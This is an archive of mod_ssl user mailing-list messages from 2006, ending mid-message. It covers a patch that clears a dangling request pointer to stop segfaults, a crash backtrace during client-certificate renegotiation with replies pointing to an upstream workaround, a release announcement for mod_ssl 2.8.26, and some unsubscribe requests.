>   --- mod_ssl.h    25 Oct 2005 04:32:42 -0000    1.1
>   +++ mod_ssl.h    25 Oct 2005 05:54:19 -0000    1.2
>   @@ -711,6 +711,7 @@
>    int          ssl_hook_Fixup(request_rec *);
>    int          ssl_hook_ReadReq(request_rec *);
>    int          ssl_hook_Handler(request_rec *);
>   +int          ssl_hook_LogRequest(request_rec *r);
> 
>    /*  OpenSSL callbacks */
>    RSA         *ssl_callback_TmpRSA(SSL *, int, int);
>   --- mod_ssl.c    25 Oct 2005 04:32:46 -0000    1.1
>   +++ mod_ssl.c    25 Oct 2005 05:52:20 -0000    1.2
>   @@ -231,7 +231,7 @@
>        ssl_hook_Access,          /* [#3] check access by host address   */
>        NULL,                     /* [#6] determine MIME type            */
>        ssl_hook_Fixup,           /* [#7] pre-run fixups                 */
>   -    NULL,                     /* [#9] log a transaction              */
>   +    ssl_hook_LogRequest,      /* [#9] log a transaction              */
>        NULL,                     /* [#2] header parser                  */
>        ssl_init_Child,           /* child_init                          */
>        NULL,                     /* child_exit                          */
>   --- ssl_engine_io.c    25 Oct 2005 04:32:28 -0000    1.1
>   +++ ssl_engine_io.c    25 Oct 2005 05:52:20 -0000    1.2
>   @@ -263,7 +263,7 @@
>            r = (request_rec *)ap_ctx_get(actx, "ssl::request_rec");
> 
>        rv = -1;
>   -    if (r != NULL) {
>   +    if (r != NULL && r->ctx != NULL) {
>            ss = ap_ctx_get(r->ctx, "ssl::io::suck");
>            if (ss != NULL) {
>                if (ss->active && ss->pendlen > 0) {
>   --- ssl_engine_kernel.c    25 Oct 2005 04:32:41 -0000    1.1
>   +++ ssl_engine_kernel.c    25 Oct 2005 05:52:20 -0000    1.2
>   @@ -542,6 +542,28 @@
>    }
> 
>    /*
>   + *  Logging Handler, last chance at request_rec
>   + */
>   +int ssl_hook_LogRequest(request_rec *r)
>   +{
>   +    SSL *ssl;
>   +    ap_ctx *apctx;
>   +
>   +    /* Mitigate potential damage of any invalid ssl::request_rec
>   +     * by clearing this datum prior to child_sub_main destroying
>   +     * our r->pool (and within in, our request_rec!!!)
>   +     */
>   +    ssl = ap_ctx_get(r->connection->client->ctx, "ssl");
>   +    if (ssl != NULL) {
>   +        apctx = SSL_get_app_data2(ssl);
>   +        if (apctx && ap_ctx_get(apctx, "ssl::request_rec")) {
>   +            ap_ctx_set(apctx, "ssl::request_rec", NULL);
>   +        }
>   +    }
>   +    return OK;
>   +}
>   +
>   +/*
>     *  Post Read Request Handler
>     */
>    int ssl_hook_ReadReq(request_rec *r)
> 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  8 09:00:18 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EFD5B14D8A2; Mon,  8 May 2006 09:00:17 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp1.engelschall.com (visp1.engelschall.com [195.30.6.144])
	by master.modssl.org (Postfix) with ESMTP id A6ED314D896
	for ; Mon,  8 May 2006 09:00:17 +0200 (CEST)
Received: by visp1.engelschall.com (Postfix, from userid 21100)
	id 19CFA1B44869; Mon,  8 May 2006 09:00:17 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 56129A1826; Mon,  8 May 2006 08:58:42 +0200 (CEST)
Date: Mon, 8 May 2006 08:58:42 +0200
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: Re: ssl_callback_SSLVerify re-negotiation handshake crash
Message-ID: <20060508065842.GB34962@engelschall.com>
References: <61E88A81-42B9-48D7-B2A3-5DE79E71E9CA@it.su.se>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
In-Reply-To: <61E88A81-42B9-48D7-B2A3-5DE79E71E9CA@it.su.se>
Organization: Engelschall, Germany.
User-Agent: Mutt/1.5.11 OpenPKG/CURRENT
Content-Transfer-Encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Apr 04, 2006, Love H=F6rnquist =C5strand wrote:

> We are running 2.8.25-1.3.34 with openssl 0.9.7g. When using
> client authentication we have crashes in ssl_callback_SSLVerify
> relasted calls. Please see backtrace below.
>
> The last entires in the log before the child httpd starts crashing is:
>
> Awaiting re-negotiation handshake
>
> Have anyone seen problems like this before and have a solution ?
> If not, we'll go ahead and add more logging and do more debugging of
> the problem.
>
> Love
>
>
> (gdb) bt
> #0  CRYPTO_get_ex_data (ad=3D0xe8, idx=3D137019688) at ex_data.c:628
> #1  0x4035c035 in SSL_get_ex_data (s=3D0x1, idx=3D296) at ssl_lib.c:222=
0
> #2  0x4031cf08 in ssl_callback_SSLVerify (ok=3D1, ctx=3D0xbfffed20)
>     at ssl_engine_kernel.c:1507
> #3  0x404125ec in internal_verify (ctx=3D0x87f55e0) at x509_vfy.c:880
> #4  0x40411e66 in X509_verify_cert (ctx=3D0xbfffed20) at x509_vfy.c:306
> #5  0x00000002 in ?? ()

I've checked the source and I it seems like the SSL* returned by
X509_STORE_CTX_get_app_data() at ssl_engine_kernel.c:1506 is the root of
the problem. But I've no clue why it is not a valid one for you... you
have to add more debugs to the code to determine the problem.

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  8 09:00:18 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 15B5E14D8A5; Mon,  8 May 2006 09:00:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp1.engelschall.com (visp1.engelschall.com [195.30.6.144])
	by master.modssl.org (Postfix) with ESMTP id 9F07314D833
	for ; Mon,  8 May 2006 09:00:17 +0200 (CEST)
Received: by visp1.engelschall.com (Postfix, from userid 21100)
	id 037CE1B44842; Mon,  8 May 2006 09:00:17 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E4D19A1826; Mon,  8 May 2006 08:53:57 +0200 (CEST)
Date: Mon, 8 May 2006 08:53:57 +0200
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: Re: PATCH Prevent segfaults in connection state
Message-ID: <20060508065357.GA34962@engelschall.com>
References: <43ECFEE9.6010104@rowe-clan.net> <445BD3AD.6000803@rowe-clan.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <445BD3AD.6000803@rowe-clan.net>
Organization: Engelschall, Germany.
User-Agent: Mutt/1.5.11 OpenPKG/CURRENT
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, May 05, 2006, William A. Rowe, Jr. wrote:

> Ping, in anticipation of a 2.8.26 for 1.3.35 (are we expecting one?)
>
> I didn't see any feedback, do any of the Apache guru's have comments?  Any
> clarifications?  (I hope I made the specifics clear enough, below.)

Hmmm... the cleanup is done in the ssl_hook_CloseConnection()
function which comes after your ssl_hook_LogRequest() anyway. Do I
understand correctly: under Win32 the r->pool is cleaned up _before_
ssl_hook_CloseConnection() is called?

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  8 09:17:55 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 44EA714D89F; Mon,  8 May 2006 09:17:55 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp1.engelschall.com (visp1.engelschall.com [195.30.6.144])
	by master.modssl.org (Postfix) with ESMTP id F14D214D833
	for ; Mon,  8 May 2006 09:17:54 +0200 (CEST)
Received: by visp1.engelschall.com (Postfix, from userid 21100)
	id 8CB411B44842; Mon,  8 May 2006 09:17:54 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 807C7A1826; Mon,  8 May 2006 09:12:58 +0200 (CEST)
Date: Mon, 8 May 2006 09:12:58 +0200
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: Re: Cleanup of mod_ssl compiler warnings
Message-ID: <20060508071258.GA40632@engelschall.com>
References: <43ECEE52.1040802@rowe-clan.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <43ECEE52.1040802@rowe-clan.net>
Organization: Engelschall, Germany.
User-Agent: Mutt/1.5.11 OpenPKG/CURRENT
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Feb 10, 2006, William A. Rowe, Jr. wrote:

> The following patches mop up some unnecessary compile warnings, when the
> functions are properly decorated.  It's been sitting in my drafts waiting
> for a subscription to go through for 3 months, so feel free to verify that
> they are still appropriate.
> [...]

I had to add some "#if SSL_LIBRARY_VERSION < 0x00904000
...#else..#endif" to the patches to let it still work on older OpenSSL
versions, but after this I've added to mod_ssl for release with version
2.8.26. Thanks for your contribution.

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  8 09:34:12 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 66B9614D8A1; Mon,  8 May 2006 09:34:12 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp1.engelschall.com (visp1.engelschall.com [195.30.6.144])
	by master.modssl.org (Postfix) with ESMTP id 21B7114D829;
	Mon,  8 May 2006 09:34:11 +0200 (CEST)
Received: by visp1.engelschall.com (Postfix, from userid 21100)
	id 614341B4486D; Mon,  8 May 2006 09:34:11 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id DC1DAA1826; Mon,  8 May 2006 09:33:55 +0200 (CEST)
Date: Mon, 8 May 2006 09:33:55 +0200
From: "Ralf S. Engelschall" 
To: modssl-announce@modssl.org, modssl-users@modssl.org
Subject: [ANNOUNCE] mod_ssl 2.8.26 for Apache 1.3.35
Message-ID: <20060508073355.GA46847@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Organization: Engelschall, Germany.
User-Agent: Mutt/1.5.11 OpenPKG/CURRENT
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

mod_ssl 2.8.26 for Apache 1.3.35 is now available:

o http://www.modssl.org/source/
o  ftp://ftp.modssl.org/source/

Yours,
                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

  Changes with mod_ssl 2.8.26 (18-Oct-2005 to 08-May-2006)

   *) Upgraded to Apache 1.3.35

   *) More correct prototype usage for passphrase callback.

   *) Some Win32 fixes.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  8 09:41:42 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 984D614D89F; Mon,  8 May 2006 09:41:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from illustrious.cnchost.com (illustrious.concentric.net [207.155.252.7])
	by master.modssl.org (Postfix) with ESMTP id 4C64914D833
	for ; Mon,  8 May 2006 09:41:41 +0200 (CEST)
Received: from [192.168.0.21] (c-24-15-193-17.hsd1.il.comcast.net [24.15.193.17])
	by illustrious.cnchost.com (ConcentricHost(2.54) Relay) with ESMTP id 1E4FEEAE9
	for ; Mon,  8 May 2006 03:41:36 -0400 (EDT)
Message-ID: <445EF62A.3090306@rowe-clan.net>
Date: Mon, 08 May 2006 02:41:30 -0500
From: "William A. Rowe, Jr." 
User-Agent: Mozilla Thunderbird 1.0.7-1.1.fc4 (X11/20050929)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: PATCH Prevent segfaults in connection state
References: <43ECFEE9.6010104@rowe-clan.net> <445BD3AD.6000803@rowe-clan.net> <20060508065357.GA34962@engelschall.com>
In-Reply-To: <20060508065357.GA34962@engelschall.com>
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "William A. Rowe, Jr." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Ralf S. Engelschall wrote:
> On Fri, May 05, 2006, William A. Rowe, Jr. wrote:
> 
>>Ping, in anticipation of a 2.8.26 for 1.3.35 (are we expecting one?)
>>
>>I didn't see any feedback, do any of the Apache guru's have comments?  Any
>>clarifications?  (I hope I made the specifics clear enough, below.)
> 
> Hmmm... the cleanup is done in the ssl_hook_CloseConnection()
> function which comes after your ssl_hook_LogRequest() anyway. Do I
> understand correctly: under Win32 the r->pool is cleaned up _before_
> ssl_hook_CloseConnection() is called?

Yes, especially, with keep alives.  Think about it, requests disappear while
the connection remains.

All in all the old code was evil, and equally faulty on unix.  Only on unix,
we never free the pool mem (just hold it for recycling) and there's no second
thread to come along and appropriate it.

Bill
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  8 10:09:42 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D6F9614D89D; Mon,  8 May 2006 10:09:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 279B814D829
	for ; Mon,  8 May 2006 10:09:41 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.12.11.20060308/8.12.11) with ESMTP id k4889XfT030404;
	Mon, 8 May 2006 04:09:33 -0400
Received: from turnip.cambridge.redhat.com (turnip.cambridge.redhat.com [172.16.18.137])
	by int-mx1.corp.redhat.com (8.12.11.20060308/8.12.11) with ESMTP id k4889VW2031376;
	Mon, 8 May 2006 04:09:32 -0400
Received: from turnip.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by turnip.cambridge.redhat.com (8.13.6/8.13.5) with ESMTP id k4889VHP009947;
	Mon, 8 May 2006 09:09:31 +0100
Received: (from jorton@localhost)
	by turnip.cambridge.redhat.com (8.13.6/8.13.6/Submit) id k4889Q4x009945;
	Mon, 8 May 2006 09:09:26 +0100
X-Authentication-Warning: turnip.cambridge.redhat.com: jorton set sender to jorton@redhat.com using -f
Date: Mon, 8 May 2006 09:09:26 +0100
From: Joe Orton 
To: "Ralf S. Engelschall" 
Cc: modssl-users@modssl.org
Subject: Re: ssl_callback_SSLVerify re-negotiation handshake crash
Message-ID: <20060508080926.GA9284@redhat.com>
Mail-Followup-To: "Ralf S. Engelschall" ,
	modssl-users@modssl.org
References: <61E88A81-42B9-48D7-B2A3-5DE79E71E9CA@it.su.se> <20060508065842.GB34962@engelschall.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <20060508065842.GB34962@engelschall.com>
User-Agent: Mutt/1.4.2.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, May 08, 2006 at 08:58:42AM +0200, Ralf S. Engelschall wrote:
> On Tue, Apr 04, 2006, Love Hörnquist Åstrand wrote:
> > (gdb) bt
> > #0  CRYPTO_get_ex_data (ad=0xe8, idx=137019688) at ex_data.c:628
> > #1  0x4035c035 in SSL_get_ex_data (s=0x1, idx=296) at ssl_lib.c:2220

Looks like http://issues.apache.org/bugzilla/show_bug.cgi?id=32529 - see 
analysis from comment 11 onwards.  This "shouldn't happen", but the 
workaround http://svn.apache.org/viewcvs?view=rev&rev=111241 should be 
safe for mod_ssl 2.8 too AFAIK.

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  8 13:50:14 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 67D6814D8A0; Mon,  8 May 2006 13:50:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web31615.mail.mud.yahoo.com (web31615.mail.mud.yahoo.com [68.142.198.161])
	by master.modssl.org (Postfix) with SMTP id B41EB14D829
	for ; Mon,  8 May 2006 13:50:13 +0200 (CEST)
Received: (qmail 39041 invoked by uid 60001); 8 May 2006 11:50:08 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=PKCja5i7IMj1750eiK1QuSoGhxTkrDJkNuT3wgAWFqQEE1H9BGFEcNa51DaltZzMzLO6wjRMQFvCklZoc/SgUCbPyh7wKAHv9z/XHvGX2aZFolfvbGwe3aJ45F7FTwhSs7JwfPHOF6yuxL7uTB+uP2GGvkZGPUuLKtocgFxo3C4=  ;
Message-ID: <20060508115008.39030.qmail@web31615.mail.mud.yahoo.com>
Received: from [220.238.241.99] by web31615.mail.mud.yahoo.com via HTTP; Mon, 08 May 2006 04:50:08 PDT
Date: Mon, 8 May 2006 04:50:08 -0700 (PDT)
From: phemelo moses pitso 
Subject: Re: Cleanup of mod_ssl compiler warnings
To: modssl-users@modssl.org
In-Reply-To: <20060508071258.GA40632@engelschall.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-758489326-1147089008=:36360"
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: phemelo moses pitso 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-758489326-1147089008=:36360
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Please rmove me from your list

"Ralf S. Engelschall"  wrote:  On Fri, Feb 10, 2006, William A. Rowe, Jr. wrote:

> The following patches mop up some unnecessary compile warnings, when the
> functions are properly decorated. It's been sitting in my drafts waiting
> for a subscription to go through for 3 months, so feel free to verify that
> they are still appropriate.
> [...]

I had to add some "#if SSL_LIBRARY_VERSION < 0x00904000
...#else..#endif" to the patches to let it still work on older OpenSSL
versions, but after this I've added to mod_ssl for release with version
2.8.26. Thanks for your contribution.

Ralf S. Engelschall
rse@engelschall.com
www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl) www.modssl.org
User Support Mailing List modssl-users@modssl.org
Automated List Manager majordomo@modssl.org


		
---------------------------------
Talk is cheap. Use Yahoo! Messenger to make PC-to-Phone calls.  Great rates starting at 1¢/min.
--0-758489326-1147089008=:36360
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Please rmove me from your list

"Ralf S. Engelschall" <rse@engelschall.com> wrote:  
On Fri, Feb 10, 2006, William A. Rowe, Jr. wrote:

> The following patches mop up some unnecessary compile warnings, when the
> functions are properly decorated. It's been sitting in my drafts waiting
> for a subscription to go through for 3 months, so feel free to verify that
> they are still appropriate.
> [...]

I had to add some "#if SSL_LIBRARY_VERSION < 0x00904000
...#else..#endif" to the patches to let it still work on older OpenSSL
versions, but after this I've added to mod_ssl for release with version
2.8.26. Thanks for your contribution.

Ralf S. Engelschall
rse@engelschall.com
www.engelschall.com

______________________________________________________________________
Apache Interface
 to OpenSSL (mod_ssl) www.modssl.org
User Support Mailing List modssl-users@modssl.org
Automated List Manager majordomo@modssl.org


		
Talk is cheap. Use Yahoo! Messenger to make PC-to-Phone calls.  Great rates starting at 1¢/min.
--0-758489326-1147089008=:36360--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon May  8 14:08:40 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 34D7D14D8A0; Mon,  8 May 2006 14:08:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web31609.mail.mud.yahoo.com (web31609.mail.mud.yahoo.com [68.142.198.155])
	by master.modssl.org (Postfix) with SMTP id B008314D829
	for ; Mon,  8 May 2006 14:08:38 +0200 (CEST)
Received: (qmail 13566 invoked by uid 60001); 8 May 2006 12:08:14 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;
  b=Qky08hL6OUI05kb7JgB3jDJcOhdpWdPqzhTg2dpDM5iYPyRc9XioboNUCcFaNOikZT4srNSOez14b3d7RLy7R+OiUflTmLqBeRY1SMg+ZHEXoRQpAlMAS3ruofMKra+ZxG6NbXm/y+C/Gn776a803M2hrhhODumQW2i7vBPvcJE=  ;
Message-ID: <20060508120756.13523.qmail@web31609.mail.mud.yahoo.com>
Received: from [220.238.241.99] by web31609.mail.mud.yahoo.com via HTTP; Mon, 08 May 2006 05:07:56 PDT
Date: Mon, 8 May 2006 05:07:56 -0700 (PDT)
From: phemelo moses pitso 
Subject: Re: PATCH Prevent segfaults in connection state
To: modssl-users@modssl.org
In-Reply-To: <445EF62A.3090306@rowe-clan.net>
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-1123420114-1147090076=:12545"
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: phemelo moses pitso 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--0-1123420114-1147090076=:12545
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

D i have to report you as spam or what please remove! THANKYOU

"William A. Rowe, Jr."  wrote:  Ralf S. Engelschall wrote:
> On Fri, May 05, 2006, William A. Rowe, Jr. wrote:
> 
>>Ping, in anticipation of a 2.8.26 for 1.3.35 (are we expecting one?)
>>
>>I didn't see any feedback, do any of the Apache guru's have comments? Any
>>clarifications? (I hope I made the specifics clear enough, below.)
> 
> Hmmm... the cleanup is done in the ssl_hook_CloseConnection()
> function which comes after your ssl_hook_LogRequest() anyway. Do I
> understand correctly: under Win32 the r->pool is cleaned up _before_
> ssl_hook_CloseConnection() is called?

Yes, especially, with keep alives. Think about it, requests disappear while
the connection remains.

All in all the old code was evil, and equally faulty on unix. Only on unix,
we never free the pool mem (just hold it for recycling) and there's no second
thread to come along and appropriate it.

Bill
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl) www.modssl.org
User Support Mailing List modssl-users@modssl.org
Automated List Manager majordomo@modssl.org


		
---------------------------------
How low will we go? Check out Yahoo! Messenger’s low  PC-to-Phone call rates.
--0-1123420114-1147090076=:12545
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

D i have to report you as spam or what please remove! THANKYOU

"William A. Rowe, Jr." <wrowe@rowe-clan.net> wrote:  
Ralf S. Engelschall wrote:
> On Fri, May 05, 2006, William A. Rowe, Jr. wrote:
> 
>>Ping, in anticipation of a 2.8.26 for 1.3.35 (are we expecting one?)
>>
>>I didn't see any feedback, do any of the Apache guru's have comments? Any
>>clarifications? (I hope I made the specifics clear enough, below.)
> 
> Hmmm... the cleanup is done in the ssl_hook_CloseConnection()
> function which comes after your ssl_hook_LogRequest() anyway. Do I
> understand correctly: under Win32 the r->pool is cleaned up _before_
> ssl_hook_CloseConnection() is called?

Yes, especially, with keep alives. Think about it, requests disappear while
the connection
 remains.

All in all the old code was evil, and equally faulty on unix. Only on unix,
we never free the pool mem (just hold it for recycling) and there's no second
thread to come along and appropriate it.

Bill
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl) www.modssl.org
User Support Mailing List modssl-users@modssl.org
Automated List Manager majordomo@modssl.org


		
How low will we go? Check out Yahoo! Messenger’s low  PC-to-Phone call rates.
--0-1123420114-1147090076=:12545--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  9 14:18:42 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 09FE114D89D; Tue,  9 May 2006 14:18:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp1.su.se (smtp1.su.se [130.237.162.112])
	by master.modssl.org (Postfix) with ESMTP id 336B514D839
	for ; Tue,  9 May 2006 14:18:40 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by smtp1.su.se (Postfix) with ESMTP id 17CFB74014;
	Tue,  9 May 2006 14:18:29 +0200 (CEST)
Received: from smtp1.su.se ([127.0.0.1])
 by localhost (smtp1.su.se [127.0.0.1]) (amavisd-new, port 10024) with LMTP
 id 04634-01-53; Tue,  9 May 2006 14:18:28 +0200 (CEST)
Received: from [130.237.95.69] (nutcracker.it.su.se [130.237.95.69])
	(using TLSv1 with cipher RC4-SHA (128/128 bits))
	(No client certificate requested)
	by smtp1.su.se (Postfix) with ESMTP id 0ACFB74002;
	Tue,  9 May 2006 14:18:21 +0200 (CEST)
In-Reply-To: <20060508080926.GA9284@redhat.com>
References: <61E88A81-42B9-48D7-B2A3-5DE79E71E9CA@it.su.se> <20060508065842.GB34962@engelschall.com> <20060508080926.GA9284@redhat.com>
Mime-Version: 1.0 (Apple Message framework v749.3)
Content-Type: multipart/signed; protocol="application/pgp-signature"; micalg=pgp-sha1; boundary="Apple-Mail-9--781309501"
Message-Id: <893F9728-BCE1-43BB-BB64-6121917CD6C2@it.su.se>
Cc: "Ralf S. Engelschall" 
Content-Transfer-Encoding: 7bit
From: =?ISO-8859-1?Q?Love_H=F6rnquist_=C5strand?= 
Subject: Re: ssl_callback_SSLVerify re-negotiation handshake crash
Date: Tue, 9 May 2006 14:18:18 +0200
To: modssl-users@modssl.org
X-Pgp-Agent: GPGMail 1.1.1 (Tiger)
X-Mailer: Apple Mail (2.749.3)
X-Virus-Scanned: by amavisd-new at smtp.su.se
X-Spam-Status: No, hits=-1.567 tagged_above=-99 required=7 tests=[AWL=0.098,
 BAYES_00=-1.665]
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Love_H=F6rnquist_=C5strand?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--Apple-Mail-9--781309501
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset=ISO-8859-1; delsp=yes; format=flowed

8 maj 2006 kl. 10.09 skrev Joe Orton:

> On Mon, May 08, 2006 at 08:58:42AM +0200, Ralf S. Engelschall wrote:
>> On Tue, Apr 04, 2006, Love H=F6rnquist =C5strand wrote:
>>> (gdb) bt
>>> #0  CRYPTO_get_ex_data (ad=3D0xe8, idx=3D137019688) at ex_data.c:628
>>> #1  0x4035c035 in SSL_get_ex_data (s=3D0x1, idx=3D296) at =
ssl_lib.c:2220
>
> Looks like http://issues.apache.org/bugzilla/show_bug.cgi?id=3D32529 =20=

> - see
> analysis from comment 11 onwards.  This "shouldn't happen", but the
> workaround http://svn.apache.org/viewcvs?view=3Drev&rev=3D111241 =
should be
